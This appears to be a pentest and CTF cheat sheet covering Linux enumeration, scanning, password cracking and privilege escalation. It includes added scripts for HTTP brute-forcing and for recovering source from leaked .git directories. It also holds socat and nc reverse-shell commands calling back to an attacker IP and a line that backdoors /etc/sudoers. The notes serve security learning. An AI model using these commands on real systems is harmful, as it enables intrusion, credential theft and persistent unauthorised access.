
2020-03-26

Work in progress…

Linux Enumeration

Information Gathering

Nmap

Manual: https://www.stationx.net/nmap-cheat-sheet/

Common options

Target Selection:

nmap 192.168.0.1                 (scan a single IP address)
nmap ca0y1h.top                  (scan a hostname directly)
nmap 192.168.0.0/24              (scan a range of IPs (192.168.0.0-255))
nmap -iL list-of-ips.txt         (scan a list of targets read from a file)

Port Selection:

nmap 127.0.0.1 -p 22             (scan the default SSH port)
nmap 127.0.0.1 -p 1-1024         (scan ports 1, 2, 3 … 1024)
nmap 127.0.0.1 -F                (fast scan: the 100 most common ports (80, 22, 21, 443, etc.))
nmap 127.0.0.1 --top-ports 2000  (scan the 2000 most common ports; -F is the same as --top-ports 100)
nmap 127.0.0.1 -p-               (all 65535 ports)

Port Scan Types:

nmap 127.0.0.1 -sT               (TCP connect scan; the default when not running as root)
nmap 127.0.0.1 -sS               (TCP SYN scan; the default as root, since it needs raw sockets)
nmap 127.0.0.1 -sU               (UDP ports; needs root and is slow)
nmap 127.0.0.1 -Pn -F            (skip host discovery and treat the host as up; use when ping/ICMP is filtered)

Service & OS Detection:

nmap 127.0.0.1 -A                (OS detection, version detection, default scripts and traceroute)
nmap 127.0.0.1 -sV               (enumerate service versions)
nmap 127.0.0.1 -sC               (run the default NSE scripts)
nmap 127.0.0.1 -sV --version-intensity 9   (try every probe, same as --version-all; the default intensity is 7)
nmap 127.0.0.1 -sV --version-intensity 0   (lightest probing, little more than banner grabbing; --version-light is intensity 2)

Timing:

nmap 127.0.0.1 -T0               (paranoid: IDS evasion, extremely slow)
nmap 127.0.0.1 -T1               (sneaky: IDS evasion)
nmap 127.0.0.1 -T2               (polite: slows down the scan, uses less bandwidth and fewer target resources)
nmap 127.0.0.1 -T3               (default speed)
nmap 127.0.0.1 -T4               (aggressive: for a fast and reliable network)
nmap 127.0.0.1 -T5               (insane: assumes low latency and high bandwidth; may miss ports)

nmap 127.0.0.1 --host-timeout 30m          (give up on a host after 30 minutes; one number with one unit, e.g. 30m or 2h)
nmap 127.0.0.1 --min-parallelism 10        (minimum probe parallelization)
nmap 127.0.0.1 --max-parallelism 50        (maximum probe parallelization)
nmap 127.0.0.1 --max-retries 3             (cap port-scan probe retransmissions at 3)
nmap 127.0.0.1 --min-rate <N>              (send at least N packets per second)

Python Script Scan

#!/usr/bin/python3
# Run the usual nmap passes against one host, saving each pass to its own -oN file.
# The -p- passes (above all the full UDP scan) take a long time, and -sU and the -O
# inside -A need raw sockets, so run this as root.

import subprocess

ippsec = "ippsec_scan.txt"
service = "service_scan.txt"
script = "script_scan.txt"
all_tcp = "all_tcp_scan.txt"
all_udp = "all_udp_scan.txt"   # was "all_tcp_scan.txt", so the UDP pass overwrote the TCP results


def ippsec_scan(ip):
    print("[!] Starting ippsec_scan ")
    subprocess.run(["nmap", "-sC", "-sV", "-oN", ippsec, ip])
    print("[+] Done ")

def service_scan(ip):
    print("[!] Starting service_scan ")
    subprocess.run(["nmap", "-A", "-p-", "-oN", service, ip])
    print("[+] Done ")

def script_scan(ip):
    print("[!] Starting script_scan ")
    # NSE categories are comma-separated with no spaces
    subprocess.run(["nmap", "--script", "discovery,safe,vuln", "-oN", script, ip])
    print("[+] Done ")

def alltcp_scan(ip):
    print("[!] Starting all_tcp_scan ")
    subprocess.run(["nmap", "-p-", "-oN", all_tcp, ip])
    print("[+] Done ")

def alludp_scan(ip):
    print("[!] Starting all_udp_scan ")
    subprocess.run(["nmap", "-p-", "-sU", "-oN", all_udp, ip])
    print("[+] Done ")

if __name__ == '__main__':
    ip = input("[+] Target IP: ")   # asked here so that importing the module does not prompt
    ippsec_scan(ip)
    service_scan(ip)
    script_scan(ip)
    alltcp_scan(ip)
    alludp_scan(ip)

Netdiscover

Nikto

Project: https://github.com/sullo/nikto

Description: an open-source web server scanner written in Perl. It fingerprints the web software and its version, looks for files that pose a security risk, checks for server misconfigurations and web-application-layer issues, and avoids false 404 positives by judging on the response body, since different file extensions return different 404 content.

Common commands:

nikto -host http://1.1.1.1                        # target given as a URL
nikto -host http://1.1.1.1 -output result.txt      # scan and save the results (-output needs a file name)
nikto -host 1.1.1.1 -port 80                      # target given as IP address plus port
nikto -host www.baidu.com -port 443 -ssl          # scan an HTTPS site
nikto -host targets.txt                           # batch scan, one host per line
nmap -p80 192.168.1.0/24 -oG - | nikto -host -    # scan the range for port 80 with nmap and pipe its greppable (-oG) output straight into nikto on stdin
nikto -host 192.168.0.1 -useproxy http://localhost:8070   # scan through a proxy
-vhost <name>                                     # set the Host header, for when one IP serves several virtual hosts (one -vhost per site)
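The `nmap ... -oG - | nikto -host -` pipeline above works because nikto understands nmap's greppable format as-is. When you want a filter in between (only open ports, only HTTP-looking services, several ports per host), you have to parse -oG yourself. The script below is an added example written for this page, not part of nmap or nikto: the scan lines in SAMPLE_OG are constructed, and the one-host:port-per-line target file it writes assumes that is the form `nikto -host <file>` reads.

```python
#!/usr/bin/python3
"""Parse nmap greppable output (-oG) and build a nikto target list from it."""
import re

# Constructed sample of what `nmap -sV -oG -` prints (not a real scan).
SAMPLE_OG = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/, 443/open/tcp//https///\tIgnored State: closed (997)
Host: 192.168.1.11 ()\tPorts: 80/filtered/tcp//http///
Host: 192.168.1.12 (web.lab)\tPorts: 8080/open/tcp//http-proxy///, 3306/open/tcp//mysql///
# Nmap done -- 3 IP addresses (3 hosts up) scanned
"""

HOST_RE = re.compile(r"^(\S+)\s+\((.*?)\)$")


def parse_grepable(text):
    """Return {ip: {"name": hostname, "ports": [(port, state, proto, service, version)]}}.

    Each Host: line is tab-separated "Key: value" fields; the Ports field is a
    comma-separated list of port/state/proto/owner/service/rpc/version/ entries.
    (A version string containing ", " would break the split; nmap does not escape it.)
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip, name = HOST_RE.match(fields["Host"]).groups()
        host = hosts.setdefault(ip, {"name": name, "ports": []})
        for entry in fields.get("Ports", "").split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            host["ports"].append((int(port), state, proto, service, version))
    return hosts


def web_targets(hosts):
    """host:port for every open TCP port that looks like HTTP."""
    out = []
    for ip, host in hosts.items():
        for port, state, proto, service, _version in host["ports"]:
            if state == "open" and proto == "tcp" and (
                    service.startswith("http") or port in (80, 443, 8080, 8443)):
                out.append(f"{ip}:{port}")
    return out


def write_nikto_targets(hosts, path):
    """Write one host:port per line for `nikto -host <path>` (format assumed); return the list."""
    targets = web_targets(hosts)
    with open(path, "w") as fh:
        fh.write("\n".join(targets) + "\n")
    return targets


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OG
    print("\n".join(web_targets(parse_grepable(text))))
```

Run stand-alone it prints the three targets from the sample; with a real scan piped in (`nmap -sV -p 80,443,8080,8443 192.168.1.0/24 -oG - | python3 og2nikto.py`, the script name being arbitrary) it prints whatever hosts actually answer on a web port, filtered ports excluded.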

GitHack

Project: https://github.com/lijiejie/GitHack

Description: GitHack is a .git leak exploitation script: from the files in an exposed .git directory it rebuilds the project's source code.

A pentester (or an attacker) can then audit that source for web vulnerabilities such as file upload and SQL injection.
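How a tool like GitHack rebuilds a project from a leaked .git: .git/index maps every tracked path to a blob SHA-1, and each blob sits zlib-compressed under .git/objects/xx/yyyy…, so an index parser and zlib are all it takes. The script below is an added example written for this page, not GitHack's own code; it reads a .git directory from disk rather than fetching the files over HTTP, and the repository it parses (two PHP files) is constructed in a temp directory by build_sample_git.

```python
#!/usr/bin/python3
"""Recover source files from a .git directory: parse .git/index, inflate loose blobs."""
import hashlib
import os
import struct
import tempfile
import zlib


def parse_index(data):
    """Return [(path, sha_hex)] from a version-2 git index ("DIRC")."""
    sig, version, count = struct.unpack(">4sII", data[:12])
    if sig != b"DIRC" or version != 2:
        raise ValueError("not a v2 git index")
    entries, pos = [], 12
    for _ in range(count):
        start = pos
        pos += 40                                   # ctime, mtime, dev, ino, mode, uid, gid, size
        sha = data[pos:pos + 20].hex()
        pos += 20
        (flags,) = struct.unpack(">H", data[pos:pos + 2])
        pos += 2
        name_len = flags & 0x0FFF                   # 0xFFF means "longer than that": read up to the NUL
        path = data[pos:pos + name_len] if name_len < 0x0FFF else data[pos:data.index(b"\0", pos)]
        pos += len(path)
        pos = start + ((pos - start) // 8 + 1) * 8  # entries are NUL-padded to a multiple of 8 bytes
        entries.append((path.decode(), sha))
    return entries


def read_loose_object(git_dir, sha):
    """Inflate .git/objects/xx/yyyy... and return (type, content), verifying size and hash."""
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "rb") as fh:
        raw = zlib.decompress(fh.read())
    header, content = raw.split(b"\0", 1)
    obj_type, size = header.split(b" ")
    if int(size) != len(content) or hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError("corrupt object " + sha)
    return obj_type.decode(), content


def recover(git_dir, out_dir):
    """Write every indexed blob under out_dir and return {path: content}."""
    with open(os.path.join(git_dir, "index"), "rb") as fh:
        entries = parse_index(fh.read())
    files = {}
    for path, sha in entries:
        if os.path.isabs(path) or ".." in path.split("/"):
            continue                                # a hostile index could point outside out_dir
        obj_type, content = read_loose_object(git_dir, sha)
        if obj_type != "blob":
            continue
        dest = os.path.join(out_dir, path)
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        with open(dest, "wb") as fh:
            fh.write(content)
        files[path] = content
    return files


def build_sample_git(files):
    """Constructed sample: write a minimal .git (index + loose blobs) for {path: bytes}."""
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    os.makedirs(os.path.join(git_dir, "objects"))
    body = b""
    for path, content in files.items():
        raw = b"blob %d\0" % len(content) + content
        sha = hashlib.sha1(raw).hexdigest()
        obj_dir = os.path.join(git_dir, "objects", sha[:2])
        os.makedirs(obj_dir, exist_ok=True)
        with open(os.path.join(obj_dir, sha[2:]), "wb") as fh:
            fh.write(zlib.compress(raw))
        name = path.encode()
        entry = struct.pack(">10I", 0, 0, 0, 0, 0, 0, 0o100644, 0, 0, len(content))
        entry += bytes.fromhex(sha) + struct.pack(">H", len(name)) + name
        entry += b"\0" * (((len(entry) // 8) + 1) * 8 - len(entry))   # pad, keeping a NUL terminator
        body += entry
    index = b"DIRC" + struct.pack(">II", 2, len(files)) + body
    with open(os.path.join(git_dir, "index"), "wb") as fh:
        fh.write(index + hashlib.sha1(index).digest())                 # trailing checksum
    return git_dir


def demo():
    """Return (original files, files recovered from the constructed .git)."""
    sample = {"config.php": b"<?php $db_pass = 'hunter2';\n",
              "lib/db.php": b"<?php // db helper\n"}
    return sample, recover(build_sample_git(sample), tempfile.mkdtemp())


if __name__ == "__main__":
    for path, content in demo()[1].items():
        print(path, content)
```

On a real leak the same three files (index, then each objects/xx/yyyy) are what the tool requests over HTTP; if directory listing is off and the index is missing, the fallback is walking from HEAD through refs and commit/tree objects, which this example does not do.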

dirb

Wfuzz

Project: https://wfuzz.readthedocs.io/en/latest/

Description: wfuzz is a Python-based web fuzzer that supports many ways of testing web applications: you can fuzz parameters, login forms and GET/POST bodies, and discover unlinked resources such as directories, files and headers.

Manual: https://www.fuzzer.xyz/2019/03/29/WFUZZ使用教程/

subDomainBrute

Project: https://github.com/lijiejie/subDomainsBrute

Description: collects a target's domains during a penetration test by high-concurrency DNS brute-force enumeration, finding subdomains that other sources (Google, aizhan, fofa) cannot.

Pigat

Project: https://github.com/teamssix/pigat

Description: a passive information-gathering aggregator. It queries third-party sites (ICP filing lookups, subdomain lookups and the like) for the target URL and collects their results, so no traffic goes to the target itself.

Password cracking

hash-identifier

Project: https://tools.kali.org/password-attacks/hash-identifier

Description: hash-identifier guesses which hash algorithm produced a given hash value. It goes by length and character set only, so hashes of the same shape (MD5 and NTLM, for instance, are both 32 hex characters) cannot be told apart; confirm from context or by trying the candidate modes in hashcat.

hashcat

John The Ripper

Project: https://www.openwall.com/john/

Example: crack the passphrase of an SSH private key

/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

Hydra

Project: https://tools.kali.org/password-attacks/hydra

Description: a very capable online brute-force tool that supports almost every network protocol; whether a password falls depends entirely on how good the wordlist is.

Detailed usage: https://www.cnblogs.com/zhaijiahui/p/8371336.html

Examples:

Web login, GET method (HTTP Basic auth)

hydra -l <user> -P <wordlist> -t <threads> -vV -e ns <ip> http-get /admin/
hydra -l <user> -P <wordlist> -t <threads> -vV -e ns -f <ip> http-get /admin/index.php

-l is a single login and -P the password list (lower-case -p would be a single password); -e ns additionally tries the empty password (n) and the login name as the password (s); -f stops after the first valid pair.

Web login, POST method (http-post-form)

https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/
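What hydra's http-get module and -e ns actually do, shown as an added example that is not part of the page or of hydra: each candidate is one GET carrying an Authorization: Basic header; -e n adds the empty password and -e s the login name itself (this example tries the extras before the wordlist); and, as in this example's rule, anything other than a 401/403 counts as a hit. The target is a throw-away local HTTP server whose only credential, admin:admin, is made up for the demo.

```python
#!/usr/bin/python3
"""HTTP Basic-auth brute force, i.e. `hydra -l user -P list -e ns host http-get /admin/`."""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def candidates(login, wordlist, extra="ns"):
    """Password order used here: the -e extras first, then the wordlist, without repeats.
    n = empty password, s = same as the login, r = the login reversed."""
    extras = {"n": "", "s": login, "r": login[::-1]}
    seen, out = set(), []
    for pw in [extras[c] for c in extra] + list(wordlist):
        if pw not in seen:
            seen.add(pw)
            out.append(pw)
    return out


def http_basic_login(url):
    """Return attempt(login, password) -> bool: one GET with an Authorization: Basic header.
    In this example anything but a 401/403 response is treated as a hit."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy env vars

    def attempt(login, password):
        token = base64.b64encode(f"{login}:{password}".encode()).decode()
        req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
        try:
            with opener.open(req, timeout=5) as resp:
                return resp.status < 400
        except urllib.error.HTTPError as err:
            return err.code not in (401, 403)
    return attempt


def brute(login, wordlist, attempt, extra="ns"):
    """Return the first password accepted by attempt(), or None (hydra's -f behaviour)."""
    for pw in candidates(login, wordlist, extra):
        if attempt(login, pw):
            return pw
    return None


class _AdminHandler(BaseHTTPRequestHandler):
    """Constructed target: /admin/ behind Basic auth; credential admin:admin is made up."""
    GOOD = "Basic " + base64.b64encode(b"admin:admin").decode()

    def do_GET(self):
        if self.headers.get("Authorization") == self.GOOD:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome\n")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="admin"')
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def demo():
    """Start the throw-away server on an ephemeral loopback port and brute-force it."""
    srv = HTTPServer(("127.0.0.1", 0), _AdminHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        url = f"http://127.0.0.1:{srv.server_address[1]}/admin/"
        return brute("admin", ["123456", "password", "letmein"], http_basic_login(url), extra="ns")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("found password:", demo())  # -e s hits admin:admin before the wordlist is touched
```

The point of -e ns is visible in demo(): the wordlist never gets used, because "same as login" is tried first. Real hydra runs this with -t parallel connections; here attempts are sequential so the request order is deterministic.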

Digital forensics

Steghide

Manual: http://steghide.sourceforge.net/documentation/manpage.php

Common commands:

Embed (steghide prompts for a passphrase; the same one is needed to extract):

$ steghide embed -cf picture.jpg -ef secret.txt

Extract:

$ steghide extract -sf picture.jpg

exiftool

Project: https://github.com/exiftool/exiftool

Manual: https://www.jianshu.com/p/d76457799de1

Privilege escalation scripts

LinEnum

Project: https://github.com/rebootuser/LinEnum

Example: ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

Options:

  • -k Enter keyword
  • -e Enter export location
  • -t Include thorough (lengthy) tests
  • -s Supply current user password to check sudo perms (INSECURE)
  • -r Enter report name
  • -h Displays this help text

Running with no options = limited scans/no output file

  • -e Requires the user enters an output location i.e. /tmp/export. If this location does not exist, it will be created.
  • -r Requires the user to enter a report name. The report (.txt file) will be saved to the current working directory.
  • -t Performs thorough (slow) tests. Without this switch default ‘quick’ scans are performed.
  • -s Use the current user with supplied password to check for sudo permissions - note this is insecure and only really for CTF use!
  • -k An optional switch for which the user can search for a single keyword within many files (documented below).

pspy

Project: https://github.com/DominicBreuker/pspy

Description: pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.

Privilege escalation commands

  • Find world-writable directories

    find / -xdev -type d -perm -0002 -ls 2> /dev/null
  • Find world-writable files

    find / -xdev -type f -perm -0002 -ls 2> /dev/null
  • Find SUID binaries

    find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
  • Find SGID binaries

    find / -perm -2000 -group root -exec ls -ld {} \; 2> /dev/null
  • Distro information

    cat /etc/*-release
  • Check listening ports and the processes behind them (-p only shows other users' processes as root)

    netstat -antup
  • Check processes

    ps -elf
  • Process monitoring tool: pspy

    • Useful for catching cron jobs or any other scheduled jobs as they run
  • Check processes running as root

    ps -elf | grep root
  • Port-number to service-name table (static; it does not show what is running, use the ps/netstat entries above for that)

    cat /etc/services
  • Check installed packages

    dpkg -l
    rpm -qa
  • Check sudo permissions

    sudo -l
  • Check kernel version and architecture

    uname -a
  • Check cron jobs (the glob also matches the cron.* directories, so expect "Is a directory" errors; list those separately)

    cat /etc/cron*
  • Check fstab

    cat /etc/fstab
  • Check network configuration

    ip addr
  • Check contents of /etc/passwd

    cat /etc/passwd
  • Using socat

    • On the attacker machine: listen, wiring the shell to a raw local tty so it is fully interactive

      $ socat file:`tty`,raw,echo=0 tcp-listen:4444
    • On the target: connect back (10.0.3.4:4444 is the attacker's listener)

      $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
  • Reverse connection using mknod (a named pipe, for when nc has no -e)

    mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc <ip> <port> 1> /tmp/backpipe; rm /tmp/backpipe
  • Check the version of an installed application

    dpkg -l <application name>
  • Sometimes checking /opt /tmp /var /usr might help.

  • Once you can write to it as root, edit the sudoers file and grant the current user (www-data in this case) passwordless sudo

    echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers
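The cron and world-writable checks above are normally cross-checked by eye. The script below automates that for system-crontab syntax (schedule, user, command): it flags jobs that run as root and execute a script that is world-writable, or that does not exist yet but would be created in a world-writable directory. It is an added example written for this page, not LinEnum's code; the crontab text and the scripts in demo() are constructed in a temp directory, and on a real target you would feed it /etc/crontab and /etc/cron.d/* instead.

```python
#!/usr/bin/python3
"""Flag root cron jobs whose script the current (unprivileged) user could replace."""
import os
import re
import stat
import tempfile

REDIRECT = re.compile(r"\d*[<>]+\S*")          # >/dev/null, 2>&1, <file
ABS_PATH = re.compile(r"/[^\s;&|<>]+")         # absolute paths inside a command line


def parse_system_crontab(text):
    """Yield (schedule, user, command) from system-crontab syntax:
    five schedule fields or an @reboot-style macro, then the user, then the command."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                            # blank, comment, or SHELL=/PATH= assignment
        if line.startswith("@"):
            parts = line.split(None, 2)
        else:
            f = line.split(None, 6)
            parts = [" ".join(f[:5]), f[5], f[6]] if len(f) == 7 else []
        if len(parts) == 3:
            yield tuple(parts)


def world_writable(path, kind=stat.S_ISREG):
    """True if path exists, is of the given kind (regular file by default) and has the
    o+w bit: the same test as `find / -type f -perm -0002`."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return kind(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def hijackable(cmd):
    """Absolute paths in cmd that are world-writable, or that do not exist but sit in a
    world-writable directory (so the file can simply be planted). Redirect targets are
    dropped first: /dev/null is world-writable too and would be a false positive."""
    hits = []
    for p in ABS_PATH.findall(REDIRECT.sub(" ", cmd)):
        if world_writable(p) or (not os.path.exists(p)
                                 and world_writable(os.path.dirname(p), stat.S_ISDIR)):
            hits.append(p)
    return hits


def find_root_cron_hijacks(crontab_text):
    """[(user, command, [writable paths])] for every root job with at least one hit."""
    found = []
    for _sched, user, cmd in parse_system_crontab(crontab_text):
        paths = hijackable(cmd) if user == "root" else []
        if paths:
            found.append((user, cmd, paths))
    return found


def demo():
    """Constructed scenario in a temp dir: a safe job, a world-writable script, a missing
    script in a world-writable directory, and a job that does not run as root."""
    base = tempfile.mkdtemp()
    safe = os.path.join(base, "rotate.sh")
    weak = os.path.join(base, "backup.sh")
    loose = os.path.join(base, "drop")
    os.mkdir(loose)
    for path, mode in ((safe, 0o755), (weak, 0o777)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    os.chmod(loose, 0o777)
    crontab = f"""# /etc/crontab (constructed)
SHELL=/bin/sh
17 * * * *  root     {safe} >/dev/null 2>&1
*/5 * * * * root     {weak}
@reboot     root     {loose}/cleanup.sh
0 2 * * *   www-data {weak}
"""
    return find_root_cron_hijacks(crontab)


if __name__ == "__main__":
    for user, cmd, paths in demo():
        print(f"[!] {user} runs {cmd!r}; writable: {paths}")
```

Two things the script deliberately does not cover: relative paths in the command (those depend on cron's PATH, which is its own hijack vector) and scripts that are safe themselves but source a writable file, which is where pspy's live view of what actually executes comes in.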

Reverse Shell

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Common tools

SQLMAP

https://zerokeeper.com/web-security/sqlmap-usage-summary.html#

https://louisnie.github.io/2019/03/03/SQLMAP/

Copyright © ca01h 2019-2020